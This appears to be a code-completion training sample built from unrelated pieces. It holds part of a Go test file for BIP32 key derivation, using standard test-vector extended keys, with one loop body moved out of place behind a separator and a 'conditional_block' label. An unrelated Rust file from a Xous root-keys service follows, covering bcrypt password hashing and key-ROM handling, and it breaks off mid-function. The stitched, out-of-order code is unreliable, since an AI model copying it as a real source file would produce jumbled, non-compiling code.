pubKey: "xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw",
},
{
pathFragment: 1,
privKey: "xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs",
pubKey: "xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ",
},
{
pathFragment: 2 + hStart,
privKey: "xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM",
pubKey: "xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5",
},
{
pathFragment: 2,
privKey: "xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334",
pubKey: "xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV",
},
{
pathFragment: 1000000000,
privKey: "xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76",
pubKey: "xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy",
},
},
}
vector2 := testMasterKey{
seed: "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542",
privKey: "xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U",
pubKey: "xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB",
children: []testChildKey{
{
pathFragment: 0,
privKey: "xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt",
pubKey: "xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH",
},
{
pathFragment: 2147483647 + hStart,
privKey: "xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9",
pubKey: "xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a",
},
{
pathFragment: 1,
privKey: "xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef",
pubKey: "xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon",
},
{
pathFragment: 2147483646 + hStart,
privKey: "xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc",
pubKey: "xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL",
},
{
pathFragment: 2,
privKey: "xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j",
pubKey: "xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt",
},
},
}
vector3 := testMasterKey{
seed: "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be",
privKey: "xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6",
pubKey: "xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13",
children: []testChildKey{
{
pathFragment: hStart + 0,
privKey: "xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L",
pubKey: "xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y",
},
},
}
testVectorKeyPairs(t, vector1)
testVectorKeyPairs(t, vector2)
testVectorKeyPairs(t, vector3)
}
func testVectorKeyPairs(t *testing.T, vector testMasterKey) {
// Decode the master seed from hex
seed, _ := hex.DecodeString(vector.seed)
// Generate a master private and public key
privKey, err := NewMasterKey(seed)
assert.NoError(t, err)
pubKey := privKey.PublicKey()
assert.Equal(t, vector.privKey, privKey.String())
assert.Equal(t, vector.pubKey, pubKey.String())
// Iterate over the entire child chain and test the given keys
for _, testChildKey := range vector.children |
}
func TestPublicParentPublicChildDerivation(t *testing.T) {
// Generated using https://iancoleman.github.io/bip39/
// Root key:
// xprv9s21ZrQH143K2Cfj4mDZBcEecBmJmawReGwwoAou2zZzG45bM6cFPJSvobVTCB55L6Ld2y8RzC61CpvadeAnhws3CHsMFhNjozBKGNgucYm
// Derivation Path m/44'/60'/0'/0:
// xprv9zy5o7z1GMmYdaeQdmabWFhUf52Ytbpe3G5hduA4SghboqWe7aDGWseN8BJy1GU72wPjkCbBE1hvbXYqpCecAYdaivxjNnBoSNxwYD4wHpW
// xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u
extendedMasterPublic, err := B58Deserialize(
"xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u",
DefaultBip32Version)
assert.NoError(t, err)
expectedChildren := []testChildKey{
{pathFragment: 0, hexPubKey: "0243187e1a2ba9ba824f5f81090650c8f4faa82b7baf93060d10b81f4b705afd46"},
{pathFragment: 1, hexPubKey: "023790d11eb715c4320d8e31fba3a09b700051dc2cdbcce03f44b11c274d1e220b"},
{pathFragment: 2, hexPubKey: "0302c5749c3c75cea234878ae3f4d8f65b75d584bcd7ed0943b016d6f6b59a2bad"},
{pathFragment: 3, hexPubKey: "03f0440c94e5b14ea5b15875934597afff541bec287c6e65dc1102cafc07f69699"},
{pathFragment: 4, hexPubKey: "026419d0d8996707605508ac44c5871edc7fe206a79ef615b74f2eea09c5852e2b"},
{pathFragment: 5, hexPubKey: "02f63c6f195eea98bdb163c4a094260dea71d264b21234bed4df3899236e6c2298"},
{pathFragment: 6, hexPubKey: "02d74709cd522081064858f393d009ead5a0ecd43ede3a1f57befcc942025cb5f9"},
{pathFragment: 7, hexPubKey: "03e54bb92630c943d38bbd8a4a2e65fca7605e672d30a0e545a7198cbb60729ceb"},
{pathFragment: 8, hexPubKey: "027e9d5acd14d39c4938697fba388cd2e8f31fc1c5dc02fafb93a10a280de85199"},
{pathFragment: 9, hexPubKey: "02a167a9f0d57468fb6abf2f3f7967e2cadf574314753a06a9ef29bc76c54638d2"},
{pathFragment: 100, hexPubKey: "020db9ba00ddf68428e3f5bfe54252bbcd75b21e42f51bf3bfc4172bf0e5fa7905"},
{pathFragment: 101, hexPubKey: "0299e3790956570737d6164e6fcda5a3daa304065ca95ba46bc73d436b84f34d46"},
{pathFragment: 102, hexPubKey: "0202e0732c4c5d2b1036af173640e01957998cfd4f9cdaefab6ffe76eb869e2c59"},
{pathFragment: 103, hexPubKey: "03d050adbd996c0c5d737ff638402dfbb8c08e451fef10e6d62fb57887c1ac6cb2"},
{pathFragment: 104, hexPubKey: "038d466399e2d68b4b16043ad4d88893b3b2f84fc443368729a973df1e66f4f530"},
{pathFragment: 105, hexPubKey: "034811e2f0c8c50440c08c2c9799b99c911c036e877e8325386ff61723ae3ffdce"},
{pathFragment: 106, hexPubKey: "026339fd5842921888e711a6ba9104a5f0c94cc0569855273cf5faefdfbcd3cc29"},
{pathFragment: 107, hexPubKey: "02833705c1069fab2aa92c6b0dac27807290d72e9f52378d493ac44849ca003b22"},
{pathFragment: 108, hexPubKey: "032d2639bde1eb7bdf8444bd4f6cc26a9d1bdecd8ea15fac3b992c3da68d9d1df5"},
{pathFragment: 109, hexPubKey: "02479c6d4a64b93a2f4343aa862c938fbc658c99219dd7bebb4830307cbd76c9e9"},
}
for _, child := range expectedChildren {
pubKey, err := extendedMasterPublic.NewChildKey(child.pathFragment)
assert.NoError(t, err)
assert.False(t, pubKey.IsPrivate)
assert.Equal(t, child.hexPubKey, hex.EncodeToString(pubKey.Key))
}
}
func TestNewSeed(t *testing.T) {
for i := 0; i < 20; i++ {
seed, err := NewSeed()
assert.NoError(t, err)
assert.Equal(t, 256, len(seed))
}
}
func TestB58SerializeUnserialize(t *testing.T) {
tests := []struct {
seed []byte
base58 string
}{
{[]byte{}, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsMC"},
{[]byte{1}, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEC"},
{[]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 0}, "xprv9s21ZrQH143K2hKT3jMKPFEcQLbx2XD55NtqQA7B4C5U9mTZY7gBeCdoFgurN4pxkQshzP8AQhBmUNgAo5djj5FzvUFh5pKH6wcRMSXVuc1"},
}
for _, test := range tests {
key, err := NewMasterKey(test.seed)
assert.NoError(t, err)
assertKeySerialization(t, key, test.base58)
}
}
func TestDeserializingInvalidStrings(t *testing.T) {
tests := []struct {
err error
base58 string
}{
{ErrSerializedKeyWrongSize, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsM"},
{ErrInvalidChecksum, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc"},
}
for _, test := range tests {
_, err := B58Deserialize(test.base58, DefaultBip32Version)
assert.Equal(t, test.err, err)
}
_, err := B58Deserialize("notbase58iiiiiIIIIIbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc",
DefaultBip32Version)
assert.NotNil(t, err)
}
func TestCantCreateHardenedPublicChild(t *testing.T) {
key, err := NewMasterKey([]byte{})
assert.NoError(t, err)
// Test that it works for private keys
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.NoError(t, err)
// Test that it throws an error for public keys if hardened
key = key.PublicKey()
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.Equal(t, ErrHardnedChildPublicKey, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.Equal(t, ErrHardnedChildPublicKey, err)
}
func assertKeySerialization(t *testing.T, key *Key, knownBase58 string) {
serializedBase58 := key.B58Serialize()
assert.Equal(t, knownBase58, serializedBase58)
unserializedBase58, err := B58Deserialize(serializedBase58, DefaultBip32Version)
assert.NoError(t, err)
assert.Equal(t, key, unserializedBase58)
}
| {
// Get the private key at the given key tree path
privKey, err = privKey.NewChildKey(testChildKey.pathFragment)
assert.NoError(t, err)
// Get this private key's public key
pubKey = privKey.PublicKey()
// Assert correctness
assert.Equal(t, testChildKey.privKey, privKey.String())
assert.Equal(t, testChildKey.pubKey, pubKey.String())
// Serialize and deserialize both keys and ensure they're the same
assertKeySerialization(t, privKey, testChildKey.privKey)
assertKeySerialization(t, pubKey, testChildKey.pubKey)
} | conditional_block |
implementation.rs | use gam::FONT_TOTAL_LEN;
use ticktimer_server::Ticktimer;
use utralib::generated::*;
use crate::api::*;
use core::num::NonZeroUsize;
use num_traits::*;
use gam::modal::{Modal, Slider};
use crate::bcrypt::*;
use crate::api::PasswordType;
use core::convert::TryInto;
use ed25519_dalek::{Keypair, Signature, Signer};
use engine_sha512::*;
use digest::Digest;
use graphics_server::BulkRead;
use core::mem::size_of;
use root_keys::key2bits::*;
// TODO: add hardware acceleration for BCRYPT so we can hit the OWASP target without excessive UX delay
const BCRYPT_COST: u32 = 7; // 10 is the minimum recommended by OWASP; takes 5696 ms to verify @ 10 rounds; 804 ms to verify 7 rounds
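// The cost/latency trade-off above can be checked directly: each +1 in BCRYPT_COST
// roughly doubles verification time. The timing sketch below is illustrative only --
// it assumes a host-side test build with std::time available, whereas the firmware
// benchmarks with the ticktimer server as done in hash_and_save_password() below.
#[cfg(test)]
mod bcrypt_cost_example {
    use super::*;

    #[test]
    fn time_one_hash_at_current_cost() {
        let salt = [0u8; 16];
        let mut hashed = [0u8; 24];
        let start = std::time::Instant::now();
        bcrypt(BCRYPT_COST, &salt, "correct horse battery staple", &mut hashed);
        println!("cost {} took {} ms", BCRYPT_COST, start.elapsed().as_millis());
    }
}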
/// Size of the total area allocated for signatures. It is equal to the size of one FLASH sector, which is the smallest
/// increment that can be erased.
const SIGBLOCK_SIZE: u32 = 0x1000;
#[repr(C)]
struct SignatureInFlash {
pub version: u32,
pub signed_len: u32,
pub signature: [u8; 64],
}
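// SignatureInFlash implies a simple on-flash layout inside the first erase sector:
// a `version` word, a `signed_len` word, then the 64-byte ed25519 signature. The
// helper below is a hedged sketch of how a verifier might pull those fields out of
// a raw sector; the little-endian word order is an assumption for illustration
// (the loader actually reads the struct in place), and the function name is ours.
#[allow(dead_code)]
fn parse_signature_block(sector: &[u8]) -> Option<(u32, u32, [u8; 64])> {
    if sector.len() < 8 + 64 {
        return None;
    }
    let version = u32::from_le_bytes(sector[0..4].try_into().ok()?);
    let signed_len = u32::from_le_bytes(sector[4..8].try_into().ok()?);
    let mut signature = [0u8; 64];
    signature.copy_from_slice(&sector[8..8 + 64]);
    Some((version, signed_len, signature))
}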
struct KeyRomLocs {}
#[allow(dead_code)]
impl KeyRomLocs {
const FPGA_KEY: u8 = 0x00;
const SELFSIGN_PRIVKEY: u8 = 0x08;
const SELFSIGN_PUBKEY: u8 = 0x10;
const DEVELOPER_PUBKEY: u8 = 0x18;
const THIRDPARTY_PUBKEY: u8 = 0x20;
const USER_KEY: u8 = 0x28;
const PEPPER: u8 = 0xf8;
const FPGA_MIN_REV: u8 = 0xfc;
const LOADER_MIN_REV: u8 = 0xfd;
const CONFIG: u8 = 0xff;
}
pub struct KeyField {
mask: u32,
offset: u32,
}
impl KeyField {
pub const fn new(width: u32, offset: u32) -> Self {
let mask = (1 << width) - 1;
KeyField {
mask,
offset,
}
}
pub fn ms(&self, value: u32) -> u32 {
let ms_le = (value & self.mask) << self.offset;
ms_le.to_be()
}
}
#[allow(dead_code)]
pub(crate) mod keyrom_config {
use crate::KeyField;
pub const VERSION_MINOR: KeyField = KeyField::new(8, 0 );
pub const VERSION_MAJOR: KeyField = KeyField::new(8, 8 );
pub const DEVBOOT_DISABLE: KeyField = KeyField::new(1, 16);
pub const ANTIROLLBACK_ENA: KeyField = KeyField::new(1, 17);
pub const ANTIROLLFORW_ENA: KeyField = KeyField::new(1, 18);
pub const FORWARD_REV_LIMIT: KeyField = KeyField::new(4, 19);
pub const FORWARD_MINOR_LIMIT: KeyField = KeyField::new(4, 23);
pub const INITIALIZED: KeyField = KeyField::new(1, 27);
}
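// How the fields above get packed: KeyField::ms() masks the value to the field
// width, shifts it to the field's bit offset, and converts the word to big-endian
// so it can be OR-ed or AND-ed directly against KEYROM words (see is_initialized()
// and do_key_init() below). This test module is a documentation sketch, not part
// of the original sources.
#[cfg(test)]
mod keyfield_example {
    use super::*;

    #[test]
    fn packs_masks_and_swaps() {
        // An 8-bit field at bit offset 8: 0x1AB is masked to 0xAB and lands in bits 8..16.
        assert_eq!(keyrom_config::VERSION_MAJOR.ms(0x1AB), 0xAB00u32.to_be());
        // A 1-bit flag only ever contributes its single bit, no matter the input.
        assert_eq!(keyrom_config::INITIALIZED.ms(0xFF), (1u32 << 27).to_be());
    }
}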
/// This structure is mapped into the password cache page and can be zero-ized at any time
/// we avoid using fancy Rust structures because everything has to "make sense" after a forced zero-ization
/// The "password" here is generated as follows:
/// `user plaintext (up to first 72 bytes) -> bcrypt (24 bytes) -> sha512trunc256 -> [u8; 32]`
/// The final sha512trunc256 expansion is because we will use this to XOR against secret keys stored in
/// the KEYROM that may be up to 256 bits in length. For shorter keys, the hashed password is simply truncated.
#[repr(C)]
struct PasswordCache {
hashed_boot_pw: [u8; 32],
hashed_boot_pw_valid: u32, // non-zero for valid
hashed_update_pw: [u8; 32],
hashed_update_pw_valid: u32,
}
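// The comment above describes the whole derivation chain (plaintext -> bcrypt ->
// sha512trunc256 -> 32 bytes) and how the result is XOR-ed against secrets in the
// KEYROM, truncating for shorter keys. The sketch below shows just the XOR
// wrap/unwrap round trip with a fixed stand-in for the hashed password; the real
// code produces that value through the bcrypt and SHA-512 engines.
#[cfg(test)]
mod password_xor_example {
    #[test]
    fn wrap_and_unwrap_round_trip() {
        let hashed_pw = [0x5Au8; 32]; // stand-in for sha512trunc256(bcrypt(pw))
        let secret_128 = [0xC3u8; 16]; // a 128-bit secret uses a truncated prefix of the hash

        // Wrap: XOR the secret with the leading bytes of the hashed password.
        let mut wrapped = [0u8; 16];
        for (dst, (&s, &k)) in wrapped.iter_mut().zip(secret_128.iter().zip(hashed_pw.iter())) {
            *dst = s ^ k;
        }
        // Unwrap: XOR with the same hash again to recover the original secret.
        let mut unwrapped = [0u8; 16];
        for (dst, (&w, &k)) in unwrapped.iter_mut().zip(wrapped.iter().zip(hashed_pw.iter())) {
            *dst = w ^ k;
        }
        assert_eq!(unwrapped, secret_128);
    }
}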
pub(crate) struct RootKeys {
keyrom: utralib::CSR<u32>,
gateware: xous::MemoryRange,
staging: xous::MemoryRange,
loader_code: xous::MemoryRange,
kernel: xous::MemoryRange,
/// regions of RAM that hold all plaintext passwords, keys, and temp data, stuck in two well-defined pages so we can
/// zero-ize it upon demand, without guessing about stack frames and/or Rust optimizers removing writes
sensitive_data: xous::MemoryRange, // this gets purged at least on every suspend, but ideally purged sooner than that
pass_cache: xous::MemoryRange, // this can be purged based on a policy, as set below
boot_password_policy: PasswordRetentionPolicy,
update_password_policy: PasswordRetentionPolicy,
cur_password_type: Option<PasswordType>, // for tracking which password we're dealing with at the UX layer
susres: susres::Susres, // for disabling suspend/resume
trng: trng::Trng,
gam: gam::Gam, // for raising UX elements directly
gfx: graphics_server::Gfx, // for reading out font planes for signing verification
spinor: spinor::Spinor,
}
impl RootKeys {
pub fn new(xns: &xous_names::XousNames) -> RootKeys {
let keyrom = xous::syscall::map_memory(
xous::MemoryAddress::new(utra::keyrom::HW_KEYROM_BASE),
None,
4096,
xous::MemoryFlags::R | xous::MemoryFlags::W,
)
.expect("couldn't map keyrom CSR range");
// read-only memory maps. even if we don't refer to them, we map them into our process
// so that no other processes can claim them
let gateware = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_MAIN_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_MAIN_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC gateware region");
let staging = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_STAGING_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_STAGING_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC staging region");
let loader_code = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::LOADER_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::LOADER_CODE_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the loader code region");
let kernel = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::KERNEL_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::KERNEL_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the kernel region");
let sensitive_data = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let pass_cache = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let spinor = spinor::Spinor::new(&xns).expect("couldn't connect to spinor server");
spinor.register_soc_token().expect("couldn't register rootkeys as the one authorized writer to the gateware update area!");
let keys = RootKeys {
keyrom: CSR::new(keyrom.as_mut_ptr() as *mut u32),
gateware,
staging,
loader_code,
kernel,
sensitive_data,
pass_cache,
update_password_policy: PasswordRetentionPolicy::AlwaysPurge,
boot_password_policy: PasswordRetentionPolicy::AlwaysKeep,
cur_password_type: None,
susres: susres::Susres::new_without_hook(&xns).expect("couldn't connect to susres without hook"),
trng: trng::Trng::new(&xns).expect("couldn't connect to TRNG server"),
gam: gam::Gam::new(&xns).expect("couldn't connect to GAM"),
gfx: graphics_server::Gfx::new(&xns).expect("couldn't connect to gfx"),
spinor
};
keys
}
fn purge_password(&mut self, pw_type: PasswordType) {
unsafe {
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
match pw_type {
PasswordType::Boot => {
for p in (*pcache_ptr).hashed_boot_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_boot_pw_valid = 0;
}
PasswordType::Update => {
for p in (*pcache_ptr).hashed_update_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_update_pw_valid = 0;
}
}
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
fn purge_sensitive_data(&mut self) {
let data = self.sensitive_data.as_slice_mut::<u32>();
for d in data.iter_mut() {
*d = 0;
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
pub fn suspend(&mut self) {
match self.boot_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Boot);
}
}
match self.update_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Update);
}
}
self.purge_sensitive_data();
}
pub fn resume(&mut self) {
}
pub fn update_policy(&mut self, policy: Option<PasswordRetentionPolicy>) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected policy update from the UX");
return;
};
if let Some(p) = policy {
match pw_type {
PasswordType::Boot => self.boot_password_policy = p,
PasswordType::Update => self.update_password_policy = p,
};
} else {
match pw_type {
PasswordType::Boot => self.boot_password_policy = PasswordRetentionPolicy::AlwaysPurge,
PasswordType::Update => self.update_password_policy = PasswordRetentionPolicy::AlwaysPurge,
};
}
// once the policy has been set, revert the current type to None
self.cur_password_type = None;
}
/// Plaintext password is passed as a &str. Any copies internally are destroyed. Caller is responsible for destroying the &str original.
/// Performs a bcrypt hash of the password, with the currently set salt; does not store the plaintext after exit.
pub fn hash_and_save_password(&mut self, pw: &str) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected password from the UX");
return;
};
let mut hashed_password: [u8; 24] = [0; 24];
let mut salt = self.get_salt();
// we change the salt ever-so-slightly for every password. This doesn't make any one password more secure;
// but it disallows guessing all the passwords with a single off-the-shelf hashcat run.
salt[0] ^= pw_type as u8;
let timer = ticktimer_server::Ticktimer::new().expect("couldn't connect to ticktimer");
// the bcrypt function takes the plaintext password and makes one copy to prime the blowfish bcrypt
// cipher. It is responsible for erasing this state.
let start_time = timer.elapsed_ms();
bcrypt(BCRYPT_COST, &salt, pw, &mut hashed_password); // note: this internally makes a copy of the password, and destroys it
let elapsed = timer.elapsed_ms() - start_time;
log::info!("bcrypt cost: {} time: {}ms", BCRYPT_COST, elapsed); // benchmark to figure out how to set cost parameter
// expand the 24-byte (192-bit) bcrypt result into 256 bits, so we can use it directly as XOR key material
// against 256-bit AES and curve25519 keys
// for such a small hash, software is the most performant choice
let mut hasher = engine_sha512::Sha512Trunc256::new(Some(engine_sha512::FallbackStrategy::SoftwareOnly));
hasher.update(hashed_password);
let digest = hasher.finalize();
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
unsafe {
match pw_type {
PasswordType::Boot => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_boot_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_boot_pw_valid = 1;
}
PasswordType::Update => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_update_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_update_pw_valid = 1;
}
}
}
}
/// Reads a 256-bit key at a given index offset
fn read_key_256(&mut self, index: u8) -> [u8; 32] {
let mut key: [u8; 32] = [0; 32];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Reads a 128-bit key at a given index offset
fn read_key_128(&mut self, index: u8) -> [u8; 16] {
let mut key: [u8; 16] = [0; 16];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Returns the `salt` needed for the `bcrypt` routine.
/// This routine handles the special-case of being uninitialized: in that case, we need to get
/// salt from a staging area, and not our KEYROM. However, `setup_key_init` must be called
/// first to ensure that the staging area has a valid salt.
fn get_salt(&mut self) -> [u8; 16] {
if !self.is_initialized() {
// we're not initialized, use the salt that should already be in the staging area
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
let mut key: [u8; 16] = [0; 16];
for (word, &keyword) in key.chunks_mut(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter()) {
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} else {
self.read_key_128(KeyRomLocs::PEPPER)
}
}
/// Called by the UX layer to track which password we're currently requesting
pub fn set_ux_password_type(&mut self, cur_type: Option<PasswordType>) {
self.cur_password_type = cur_type;
}
/// Called by the UX layer to check which password request is in progress
pub fn get_ux_password_type(&self) -> Option<PasswordType> {self.cur_password_type}
pub fn is_initialized(&mut self) -> bool {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
if config & keyrom_config::INITIALIZED.ms(1) != 0 {
true
} else {
false
}
}
/// Called by the UX layer to set up a key init run. It disables suspend/resume for the duration
/// of the run, and also sets up some missing fields of KEYROM necessary to encrypt passwords.
pub fn setup_key_init(&mut self) {
// block suspend/resume ops during security-sensitive operations
self.susres.set_suspendable(false).expect("couldn't block suspend/resume");
// in this block, keyrom data is copied into RAM.
